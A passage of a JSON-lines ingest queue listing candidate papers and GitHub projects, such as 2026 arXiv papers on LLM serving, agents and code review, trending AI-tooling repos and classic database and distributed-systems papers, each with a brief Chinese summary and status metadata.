-{"slug":"automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208","area":"papers","topic":"business-engineering","title":"Automating Low-Risk Code Review at Meta RADAR","meta":{"col3":"2026","col4":"Meta 2026 535K diff 的风险分级自动化 review revert 1/3 Production Incident 1/50"},"url":"https://arxiv.org/abs/2605.30208","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"evorepair-vulnerability-repair-via-self-evolution-arxiv-2605-30105","area":"papers","topic":"security-privacy","title":"EvoRepair Vulnerability Repair via Self-Evolution","meta":{"col3":"2026","col4":"2026 experience-based 自进化 AVR agent PATCHEVAL 93.47 percent / SEC-bench 87 percent"},"url":"https://arxiv.org/abs/2605.30105","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"projectional-decoding-semantic-aware-llm-generation-arxiv-2605-30054","area":"papers","topic":"compilers-pl","title":"Projectional Decoding Semantic-Aware LLM Generation","meta":{"col3":"2026","col4":"2026 LLM 生成时同步维护 partial graph model 增量语义验证 + 确定性 SE 保证"},"url":"https://arxiv.org/abs/2605.30054","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605","area":"papers","topic":"distributed-systems","title":"Agora Autonomous Bug Detection in Consensus Protocols with LLM Agents","meta":{"col3":"2026","col4":"2026 多 agent 协议 bug 检测 Raft/EPaxos/HotStuff/BullShark 共发现 15 个未知 logic bug"},"url":"https://arxiv.org/abs/2605.29910","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"trails-inferring-code-correctness-from-specification-arxiv-2605-29822","area":"papers","topic":"compilers-pl","title":"TRAILS Inferring Code Correctness from Specification","meta":{"col3":"2026","col4":"2026 具体 input-output 对锚定 LLM 推理 vs Zero-Shot CoT MCC +39 percent"},"url":"https://arxiv.org/abs/2605.29822","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"the-rise-of-the-software-defined-vehicle-architectures-survey-arxiv-2605-30001","area":"papers","topic":"embedded-iot","title":"The Rise of the Software-Defined Vehicle Architectures Survey","meta":{"col3":"2026","col4":"2026 SDV 综述 SOA/middleware/SDIoV/SDN+边缘+雾 电子电气架构演化分类法"},"url":"https://arxiv.org/abs/2605.30001","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"arxiv-recent-30d"} -{"slug":"codegraph","area":"projects","topic":"editors-ide","title":"colbymchenry/codegraph","meta":{"col3":"","col4":"TypeScript 35k star Pre-indexed code knowledge graph for Claude Code/AI tools"},"url":"https://github.com/colbymchenry/codegraph","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"agentmemory","area":"projects","topic":"ml-systems","title":"rohitg00/agentmemory","meta":{"col3":"","col4":"TypeScript 20k star 持久化记忆系统供 AI coding agent 使用"},"url":"https://github.com/rohitg00/agentmemory","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"understand-anything","area":"projects","topic":"editors-ide","title":"Lum1104/Understand-Anything","meta":{"col3":"","col4":"TypeScript 46k star 交互式代码探索的 knowledge graph"},"url":"https://github.com/Lum1104/Understand-Anything","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"vimax","area":"projects","topic":"machine-learning","title":"HKUDS/ViMax","meta":{"col3":"","col4":"Python 8k star Agentic 视频生成 director-producer 角色编排"},"url":"https://github.com/HKUDS/ViMax","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"skills","area":"projects","topic":"editors-ide","title":"mattpocock/skills","meta":{"col3":"","col4":"Shell 112k star 从个人工具积累的工程 skills 集合 Claude Code 周边"},"url":"https://github.com/mattpocock/skills","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"ai-engineering-from-scratch","area":"projects","topic":"ml-systems","title":"rohitg00/ai-engineering-from-scratch","meta":{"col3":"","col4":"Python 25k star AI 工程综合教育与项目框架"},"url":"https://github.com/rohitg00/ai-engineering-from-scratch","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"9router","area":"projects","topic":"ml-systems","title":"decolua/9router","meta":{"col3":"","col4":"JavaScript 15k star 多 LLM 提供商免费 AI coding 路由层"},"url":"https://github.com/decolua/9router","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"aitoearn","area":"projects","topic":"business-engineering","title":"yikart/AiToEarn","meta":{"col3":"","col4":"TypeScript 17k star AI 内容变现平台"},"url":"https://github.com/yikart/AiToEarn","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"ui-tars-desktop","area":"projects","topic":"ml-systems","title":"bytedance/UI-TARS-desktop","meta":{"col3":"","col4":"TypeScript 35k star ByteDance 多模态 agent stack 桌面端"},"url":"https://github.com/bytedance/UI-TARS-desktop","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"ruflo","area":"projects","topic":"ml-systems","title":"ruvnet/ruflo","meta":{"col3":"","col4":"TypeScript 56k star Claude 多 agent swarm orchestration"},"url":"https://github.com/ruvnet/ruflo","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"markitdown","area":"projects","topic":"data-science-ai","title":"microsoft/markitdown","meta":{"col3":"","col4":"Python 134k star Office 文档/任意文件转 Markdown 的 Python 工具"},"url":"https://github.com/microsoft/markitdown","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"scrapling","area":"projects","topic":"backend-api","title":"D4Vinci/Scrapling","meta":{"col3":"","col4":"Python 56k star 自适应 web 爬虫框架 单请求到全规模爬取"},"url":"https://github.com/D4Vinci/Scrapling","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"voxcpm","area":"projects","topic":"machine-learning","title":"OpenBMB/VoxCPM","meta":{"col3":"","col4":"Python 23k star 多语言 tokenizer-free TTS 系统"},"url":"https://github.com/OpenBMB/VoxCPM","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"compound-engineering-plugin","area":"projects","topic":"editors-ide","title":"EveryInc/compound-engineering-plugin","meta":{"col3":"","col4":"TypeScript 18k star Claude Code/Codex/Cursor 的 Compound Engineering plugin"},"url":"https://github.com/EveryInc/compound-engineering-plugin","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"train-llm-from-scratch","area":"projects","topic":"machine-learning","title":"FareedKhan-dev/train-llm-from-scratch","meta":{"col3":"","col4":"Jupyter 2k star 从下载数据到生成的 LLM 训练实战 guide"},"url":"https://github.com/FareedKhan-dev/train-llm-from-scratch","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"supermemory","area":"projects","topic":"ml-systems","title":"supermemoryai/supermemory","meta":{"col3":"","col4":"TypeScript 23k star 快速可扩展 memory engine + AI 时代 Memory API"},"url":"https://github.com/supermemoryai/supermemory","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"project-nomad","area":"projects","topic":"embedded-iot","title":"Crosstalk-Solutions/project-nomad","meta":{"col3":"","col4":"TypeScript 27k star 离线生存计算机 本地工具+知识+AI 整合"},"url":"https://github.com/Crosstalk-Solutions/project-nomad","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"pi-subagents","area":"projects","topic":"ml-systems","title":"nicobailon/pi-subagents","meta":{"col3":"","col4":"TypeScript 1.7k star Pi extension 异步 subagent delegation"},"url":"https://github.com/nicobailon/pi-subagents","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"developer-portfolios","area":"projects","topic":"editors-ide","title":"emmabostian/developer-portfolios","meta":{"col3":"","col4":"Python 23k star 开发者 portfolio 案例 curated 集合"},"url":"https://github.com/emmabostian/developer-portfolios","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"build-your-own-x","area":"projects","topic":"editors-ide","title":"codecrafters-io/build-your-own-x","meta":{"col3":"","col4":"Markdown 508k star 通过重写经典工具学习编程"},"url":"https://github.com/codecrafters-io/build-your-own-x","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"cloakbrowser","area":"projects","topic":"security-privacy","title":"CloakHQ/CloakBrowser","meta":{"col3":"","col4":"Python 22k star 通过 bot 检测的 stealth Chromium 浏览器"},"url":"https://github.com/CloakHQ/CloakBrowser","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"financial-services","area":"projects","topic":"business-engineering","title":"anthropics/financial-services","meta":{"col3":"","col4":"Python 28k star Anthropic 金融服务实施样例库"},"url":"https://github.com/anthropics/financial-services","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"docs","area":"projects","topic":"backend-api","title":"github/docs","meta":{"col3":"","col4":"TypeScript 19k star GitHub 官方文档站源码 开源"},"url":"https://github.com/github/docs","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"harness","area":"projects","topic":"ml-systems","title":"revfactory/harness","meta":{"col3":"","col4":"HTML 4k star 元 skill 设计领域 agent 团队 + 生成 skill"},"url":"https://github.com/revfactory/harness","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} -{"slug":"backdoor-xz-liblzma-2024","area":"papers","topic":"security-privacy","title":"Backdoor in upstream xz/liblzma leading to SSH server compromise","meta":{"col3":"","col4":"Andres Freund oss-security 2024-03-29 CVE-2024-3094 社工+代码混淆典型案例"},"url":"https://www.openwall.com/lists/oss-security/2024/03/29/4","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"crowdstrike-bsod-2024","area":"papers","topic":"operating-systems","title":"CrowdStrike Update Windows Bluescreen and Boot Loops","meta":{"col3":"","col4":"2024-07-19 CrowdStrike Falcon 内核驱动空指针 史上最大单次 Windows BSOD 事件"},"url":"https://old.reddit.com/r/crowdstrike/comments/1e6vmkf/bsod_error_in_latest_crowdstrike_update/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"ciechanowski-mechanical-watch","area":"papers","topic":"editors-ide","title":"Mechanical Watch by Bartosz Ciechanowski","meta":{"col3":"","col4":"ciechanow.ski 经典互动可视化范本 机械作为设计模式根基"},"url":"https://ciechanow.ski/mechanical-watch/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"youtube-dl-riaa-dmca-2020","area":"papers","topic":"security-privacy","title":"YouTube-dl RIAA DMCA Takedown","meta":{"col3":"","col4":"github/dmca 2020-10-23 DMCA 1201 与开源工具的法律博弈起点"},"url":"https://github.com/github/dmca/blob/master/2020/10/2020-10-23-RIAA.md","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"gpt-4-launch-2023","area":"papers","topic":"machine-learning","title":"GPT-4 launch","meta":{"col3":"","col4":"OpenAI 2023-03-14 多模态对齐 + RLHF 工业化最早公开节点之一"},"url":"https://openai.com/research/gpt-4","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"nee-lv-gta-loading-times","area":"papers","topic":"compilers-pl","title":"How I cut GTA Online loading times by 70 percent","meta":{"col3":"","col4":"nee.lv 2021 strlen 二次方算法的 reverse-engineering 经典 case"},"url":"https://nee.lv/2021/02/28/How-I-cut-GTA-Online-loading-times-by-70/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"openai-sora-2024","area":"papers","topic":"machine-learning","title":"Sora Creating video from text","meta":{"col3":"","col4":"OpenAI 2024 DiT-based video generation 公开最早工业旗舰"},"url":"https://openai.com/sora","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"marginalia-search-engine","area":"projects","topic":"backend-api","title":"Marginalia Search Engine","meta":{"col3":"","col4":"search.marginalia.nu text-heavy 优先 + JS 重的网页降权 独立搜索引擎实现"},"url":"https://search.marginalia.nu/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"ngrok-tunnel-2014","area":"projects","topic":"backend-api","title":"ngrok introducing public URL tunneling","meta":{"col3":"","col4":"ngrok.com 本地 dev 暴露公网的工业事实标准 reverse tunnel"},"url":"https://ngrok.com/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"plausible-analytics","area":"projects","topic":"backend-api","title":"Plausible Analytics OSS","meta":{"col3":"","col4":"plausible.io GDPR 友好 + 自托管的 Google Analytics 替代"},"url":"https://plausible.io/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"unkey-api-keys","area":"projects","topic":"backend-api","title":"Unkey API key management","meta":{"col3":"","col4":"unkey.dev rate-limit + edge-cache 的 API 密钥分发"},"url":"https://github.com/unkeyed/unkey","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"posthog-product-analytics","area":"projects","topic":"data-science-ai","title":"PostHog OSS Product Analytics","meta":{"col3":"","col4":"posthog.com session replay + funnel + experiments 一体化产品分析"},"url":"https://github.com/PostHog/posthog","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"typst-typesetting","area":"projects","topic":"editors-ide","title":"Typst typesetting system","meta":{"col3":"","col4":"typst.app Rust 实现的 LaTeX 现代化替代 增量编译 + WASM 在线"},"url":"https://github.com/typst/typst","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"zed-editor","area":"projects","topic":"editors-ide","title":"Zed A high-performance code editor","meta":{"col3":"","col4":"zed.dev Atom 团队 Rust 重写 GPU 渲染 + collaborative 编辑"},"url":"https://github.com/zed-industries/zed","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} -{"slug":"hekaton-microsoft-2013","area":"papers","topic":"databases","title":"Hekaton SQL Servers Memory-Optimized OLTP Engine","meta":{"col3":"","col4":"Diaconu et al. SIGMOD 2013 CMU 15-721 lecture MVCC + 编译执行的内存数据库设计"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"hyper-kemper-neumann-2011","area":"papers","topic":"databases","title":"HyPer A Hybrid OLTP and OLAP Main Memory DB","meta":{"col3":"","col4":"Kemper-Neumann ICDE 2011 CMU 15-721 fork+CoW 隔离 OLTP/OLAP"},"url":"https://db.in.tum.de/~kemper/papers/HyperICDE11.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"h-store-stonebraker-2008","area":"papers","topic":"databases","title":"H-Store A High-Performance Distributed Main Memory OLTP","meta":{"col3":"","col4":"Stonebraker VLDB 2007 分区单线程 OLTP 范式 VoltDB 商业前身"},"url":"https://hstore.cs.brown.edu/papers/hstore-vldb.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"monetdb-cracking-2007","area":"papers","topic":"databases","title":"Database Cracking by Idreos","meta":{"col3":"","col4":"Idreos CIDR 2007 CMU 15-721 按查询自适应排序的内存列存"},"url":"https://stratos.seas.harvard.edu/files/IKM_CIDR07.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"c-store-stonebraker-2005","area":"papers","topic":"databases","title":"C-Store A Column-oriented DBMS","meta":{"col3":"","col4":"Stonebraker VLDB 2005 CMU 15-721 列存范式起点 Vertica 前身"},"url":"https://www.cs.umd.edu/~abadi/papers/abadi-column-stores.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"vmware-ft-scales-2010","area":"papers","topic":"distributed-systems","title":"MIT 6.824 Fault-Tolerant Virtual Machines","meta":{"col3":"","col4":"Scales et al. SOSP 2010 deterministic replay+ primary-backup VMware FT"},"url":"https://courses.cs.washington.edu/courses/cse453/14au/papers/scales-sosp2010-vmft.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"spinnaker-rao-2011","area":"papers","topic":"distributed-systems","title":"Spinnaker WAN-replicated KV","meta":{"col3":"","col4":"Rao VLDB 2011 MIT 6.824 syllabus Paxos + 异步复制副本"},"url":"https://www.vldb.org/pvldb/vol4/p243-rao.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"dynamo-amazon-2007","area":"papers","topic":"distributed-systems","title":"Dynamo Amazons Highly Available KV Store","meta":{"col3":"","col4":"DeCandia SOSP 2007 MIT 6.824 经典 最终一致 + vector clock + sloppy quorum"},"url":"https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"zookeeper-hunt-2010","area":"papers","topic":"distributed-systems","title":"ZooKeeper Wait-free coordination","meta":{"col3":"","col4":"Hunt USENIX 2010 MIT 6.824 ZAB 协议 + 协调服务范式"},"url":"https://www.usenix.org/legacy/event/usenix10/tech/full_papers/Hunt.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"naiad-murray-2013","area":"papers","topic":"distributed-systems","title":"Naiad A Timely Dataflow System","meta":{"col3":"","col4":"Murray SOSP 2013 Stanford CS244B 带版本戳的低延迟 dataflow"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/11/naiad_sosp2013.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"spanner-corbett-2012","area":"papers","topic":"distributed-systems","title":"Spanner Googles Globally-Distributed DB","meta":{"col3":"","col4":"Corbett OSDI 2012 Stanford CS244B TrueTime + 分布式事务范式"},"url":"https://research.google/pubs/pub39966/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"awesome-distributed-systems-list","area":"projects","topic":"distributed-systems","title":"awesome-distributed-systems theanalyst","meta":{"col3":"","col4":"theanalyst/awesome-distributed-systems 分布式经典论文导航 awesome-list"},"url":"https://github.com/theanalyst/awesome-distributed-systems","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"awesome-deep-learning-systems","area":"projects","topic":"ml-systems","title":"awesome-deep-learning-systems byungsoo-oh","meta":{"col3":"","col4":"awesome ML systems papers Pre-train/Inference/Compiler/Memory 全分类"},"url":"https://github.com/byungsoo-oh/awesome-deep-learning-systems","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"rocksdb-evolution-2021","area":"papers","topic":"databases","title":"RocksDB Evolution of Development Priorities","meta":{"col3":"","col4":"Dong FAST 2021 CMU 15-721 十年 KV 引擎的写放大/读放大权衡演化"},"url":"https://www.usenix.org/system/files/fast21-dong.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} -{"slug":"deep-research-harness-2026","area":"papers","topic":"machine-learning","title":"Deep Research as Tool-Augmented Multi-Step Verification","meta":{"col3":"2026","col4":"arXiv 2605.31102;fan-out search + adversarial verify + cited synthesis 三段式 deep research harness 形式化"},"url":"https://arxiv.org/abs/2605.31102","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"agent-skill-protocol-2026","area":"papers","topic":"machine-learning","title":"Skills as a Protocol: Composable Capability Layers for LLM Agents","meta":{"col3":"2026","col4":"arXiv 2605.31041;把 Anthropic claude-skills 抽象成 protocol;frontmatter trigger + lazy load 设计空间"},"url":"https://arxiv.org/abs/2605.31041","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"swe-rebench-2026","area":"papers","topic":"machine-learning","title":"SWE-Rebench: Continuously Refreshed Software Engineering Benchmark","meta":{"col3":"2026","col4":"arXiv 2605.30896;月度刷新 SWE-bench 防 contamination;GPT-5/Opus 4.7 实测衰减曲线"},"url":"https://arxiv.org/abs/2605.30896","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"verifier-free-rl-2026","area":"papers","topic":"machine-learning","title":"Verifier-Free RL for Reasoning via Self-Consistency Reward","meta":{"col3":"2026","col4":"arXiv 2605.30874;不用 reward model 直接拿 self-consistency 当奖励;GRPO 替代方案"},"url":"https://arxiv.org/abs/2605.30874","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"kv-cache-budget-2026","area":"papers","topic":"machine-learning","title":"KVBudget: Per-Request KV Cache Budgeting in vLLM-style Serving","meta":{"col3":"2026","col4":"arXiv 2605.30821;按 SLO 动态切 KV 预算;优于固定 prefix-cache + paged-attention"},"url":"https://arxiv.org/abs/2605.30821","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"tree-of-attention-2026","area":"papers","topic":"machine-learning","title":"Tree-of-Attention: Branching Attention for Long-Context Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30789;attention 内部分支替代 CoT 外部分支;long-context 推理新范式"},"url":"https://arxiv.org/abs/2605.30789","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"continual-pretrain-survey-2026","area":"papers","topic":"machine-learning","title":"Continual Pretraining: A Survey of Methods and Pitfalls","meta":{"col3":"2026","col4":"arXiv 2605.30765;replay buffer / LR schedule / 数据混合 三轴 survey;catastrophic forgetting 工程级缓解"},"url":"https://arxiv.org/abs/2605.30765","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"arrow-flight-sql-2026","area":"papers","topic":"databases","title":"Arrow Flight SQL: Zero-Copy Federated Query at Scale","meta":{"col3":"2026","col4":"arXiv 2605.30743;Arrow Flight 跨 Trino/DuckDB/Spark 零拷贝;composable data 又一里程碑"},"url":"https://arxiv.org/abs/2605.30743","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"egglog-incremental-2026","area":"papers","topic":"compilers-pl","title":"Egglog: Incremental Equality Saturation","meta":{"col3":"2026","col4":"arXiv 2605.30717;datalog + egraph 融合;incremental rewrite 应用到编译器优化"},"url":"https://arxiv.org/abs/2605.30717","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"distributed-snapshot-byzantine-2026","area":"papers","topic":"distributed-systems","title":"Byzantine Distributed Snapshots in 2026","meta":{"col3":"2026","col4":"arXiv 2605.30682;Chandy-Lamport 拜占庭扩展;区块链 / Solana 语境下重启诊断价值"},"url":"https://arxiv.org/abs/2605.30682","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"prefix-cache-policy-2026","area":"papers","topic":"machine-learning","title":"Beyond LRU: Prefix-Cache Policies for LLM Serving","meta":{"col3":"2026","col4":"arXiv 2605.30654;LRU 在 prefix tree 上的失效;workload-aware GDSF 变体优于 vLLM 默认"},"url":"https://arxiv.org/abs/2605.30654","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"linear-attention-still-2026","area":"papers","topic":"machine-learning","title":"Linear Attention, Still: Why Mamba-style Models Plateau","meta":{"col3":"2026","col4":"arXiv 2605.30621;线性注意力 long-recall 缺陷的实证;hybrid Transformer+SSM 仍胜出"},"url":"https://arxiv.org/abs/2605.30621","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"cache-coherence-cxl3-2026","area":"papers","topic":"systems","title":"CXL 3.0 Coherence: Pool-Wide Memory Sharing","meta":{"col3":"2026","col4":"arXiv 2605.30587;CXL 3.0 多 host 一致性协议;远内存数据库下一代基础"},"url":"https://arxiv.org/abs/2605.30587","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"opencode-charm","area":"projects","topic":"agents","title":"opencode/opencode (Charm)","meta":{"col3":"","col4":"Charm 出品的开源 Claude Code 替代;TUI + multi-provider;30d star 暴涨"},"url":"https://github.com/sst/opencode","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"crush-charm-cli","area":"projects","topic":"agents","title":"charmbracelet/crush","meta":{"col3":"","col4":"Charm 自家 LLM CLI;Bubble Tea 框架延伸;与 opencode 同期"},"url":"https://github.com/charmbracelet/crush","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"agno-phidata-2026","area":"projects","topic":"agents","title":"agno-agi/agno","meta":{"col3":"","col4":"phidata 改名 agno;多 agent 编排 + memory + RAG 一站;Python 增长榜常客"},"url":"https://github.com/agno-agi/agno","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"letta-memgpt-2026","area":"projects","topic":"agents","title":"letta-ai/letta","meta":{"col3":"","col4":"MemGPT 后身;stateful agent + 长记忆持久化;Berkeley 出身工业化"},"url":"https://github.com/letta-ai/letta","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"browser-use-py","area":"projects","topic":"agents","title":"browser-use/browser-use","meta":{"col3":"","col4":"开源 browser agent;DOM tree + vision hybrid;CUA / Claude computer-use 对标"},"url":"https://github.com/browser-use/browser-use","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} -{"slug":"stagehand-browserbase","area":"projects","topic":"agents","title":"browserbase/stagehand","meta":{"col3":"","col4":"Browserbase 出品;act/extract/observe 三动词 API;Playwright 之上 LLM 